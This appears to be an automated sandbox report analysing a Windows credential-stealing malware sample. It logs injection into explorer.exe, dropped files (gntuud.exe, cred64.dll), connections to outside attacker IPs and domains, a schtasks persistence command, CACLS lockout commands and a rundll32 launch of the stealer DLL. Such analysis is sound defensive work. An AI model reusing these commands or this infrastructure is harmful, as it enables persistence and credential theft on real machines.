                              Source: C:\Windows\SysWOW64\explorer.exe TID: 3680Thread sleep time: -120000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768Thread sleep time: -30000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 5044Thread sleep time: -50000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 240Thread sleep time: -360000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 3180Thread sleep time: -1440000s >= -30000s
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe TID: 2768Thread sleep time: -30000s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 3536Thread sleep count: 103 > 30
                              Source: C:\Windows\explorer.exe TID: 3536Thread sleep time: -103000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2156Thread sleep count: 1280 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 2156Thread sleep time: -768000000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5540Thread sleep count: 151 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5540Thread sleep time: -151000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5716Thread sleep count: 149 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 5716Thread sleep time: -149000s >= -30000s
                              Source: C:\Windows\explorer.exe TID: 5864Thread sleep count: 148 > 30
                              Source: C:\Windows\explorer.exe TID: 5864Thread sleep time: -148000s >= -30000s
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 1164Thread sleep count: 146 > 30
                              Source: C:\Windows\SysWOW64\explorer.exe TID: 1164Thread sleep time: -146000s >= -30000s
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 360000
                              Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 656
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1110
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1051
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 553
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 917
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 874
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 373
                              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 442
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeWindow / User API: foregroundWindowGot 1702
                              Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 1280
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeAPI coverage: 4.9 %
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 30000
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 50000
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 180000
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 360000
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeThread delayed: delay time: 30000
                              Source: C:\Windows\SysWOW64\explorer.exeThread delayed: delay time: 600000
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
                              Source: gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpn
                              Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499375753.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: explorer.exe, 00000001.00000000.280449934.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                              Source: explorer.exe, 00000001.00000000.294760669.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                              Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                              Source: explorer.exe, 00000001.00000000.343444217.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                              Source: explorer.exe, 00000001.00000000.352809603.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                              Source: C:\Windows\explorer.exeProcess information queried: ProcessInformation
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2A284 FindFirstFileExW,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF1396 FindFirstFileExW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2B3BA mov eax, dword ptr fs:[00000030h]
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C20FDC mov eax, dword ptr fs:[00000030h]
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DEC0E1 mov eax, dword ptr fs:[00000030h]
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DEE6F2 mov eax, dword ptr fs:[00000030h]
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeProcess queried: DebugPort
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C2D9C0 GetProcessHeap,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17C6E SetUnhandledExceptionFilter,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C177E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C1D7A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17B0C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE8943 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE9247 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DED260 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                              HIPS / PFW / Operating System Protection Evasion

                              barindex
                              Source: C:\Windows\explorer.exeNetwork Connect: 31.41.244.228 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 62.204.41.79 80
                              Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.3 80
                              Source: C:\Windows\explorer.exeDomain query: r3oidsofsios.com
                              Source: C:\Windows\explorer.exeDomain query: kikangalaassociates.com
                              Source: C:\Windows\explorer.exeFile created: thgcici.1.drJump to dropped file
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                              Source: C:\Users\user\AppData\Roaming\thgciciSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,
                              Source: C:\Users\user\Desktop\kmxId0uLRn.exeThread created: C:\Windows\explorer.exe EIP: 5791A08
                              Source: C:\Users\user\AppData\Roaming\thgciciThread created: unknown EIP: 57E1A08
                              Source: C:\Users\user\AppData\Roaming\thgciciThread created: unknown EIP: 5851A08
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: EDF380
                              Source: C:\Windows\explorer.exeMemory written: PID: 2096 base: EDF380 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 3940 base: 7FF69FF38150 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 1020 base: EDF380 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 4044 base: 7FF69FF38150 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 4696 base: EDF380 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 5536 base: EDF380 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 5692 base: EDF380 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 5896 base: 7FF69FF38150 value: 90
                              Source: C:\Windows\explorer.exeMemory written: PID: 1004 base: EDF380 value: 90
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeProcess created: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe"
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe" /F
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\2c33368f7d" /P "user:N"&&CACLS "..\2c33368f7d" /P "user:R" /E&&Exit
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, Main
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /E
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:N"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\2c33368f7d" /P "user:R" /E
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4480 ShellExecuteA,
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                              Source: explorer.exe, 00000001.00000000.353202489.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                              Source: explorer.exe, 00000001.00000000.339855935.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.274453869.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.312183179.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                              Source: explorer.exe, 00000001.00000000.340737155.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.312600735.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.274772666.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: EnumSystemLocalesW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C17D75 cpuid
                              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                              Source: C:\Users\user\AppData\Local\Temp\8F68.exeCode function: 12_2_00C179FF GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DF53B4 _free,_free,_free,GetTimeZoneInformation,_free,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DE4010 Sleep,IsUserAnAdmin,GetUserNameA,GetComputerNameExW,GetModuleFileNameA,
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD4D90 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 44.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.3.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.9545.exe.dd0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 44.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 21.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 29.2.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.0.9545.exe.dd0000.2.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 29.0.gntuud.exe.f00000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001D.00000000.425029230.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001D.00000002.428729367.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403627141.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000000.417948151.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002C.00000000.541818627.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403992347.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.402947790.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002C.00000002.547069275.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.418854109.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.788503094.0000000000F01000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000000.403831524.0000000000DD1000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\2c33368f7d\gntuud.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\bf045808586a24\cred64.dll, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\9545.exe, type: DROPPED
                              Source: Yara matchFile source: 00000013.00000002.775997702.0000000000521000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000016.00000002.774640150.00000000006B1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1020, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4044, type: MEMORYSTR
                              Source: Yara matchFile source: 43.3.thgcici.490000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.6a0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.5d0e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.3.kmxId0uLRn.exe.5e0000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.kmxId0uLRn.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.3.thgcici.2090000.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.470e67.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 43.2.thgcici.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000002B.00000003.588957160.0000000000490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.605352083.0000000002101000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000003.263185446.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458517384.00000000020F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.458480142.00000000020D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354414685.0000000000601000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.354377233.00000000005E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000002B.00000002.603086862.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.344354545.0000000005791000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000003.425062940.0000000002090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000003.499443031.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.783235470.0000000000BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
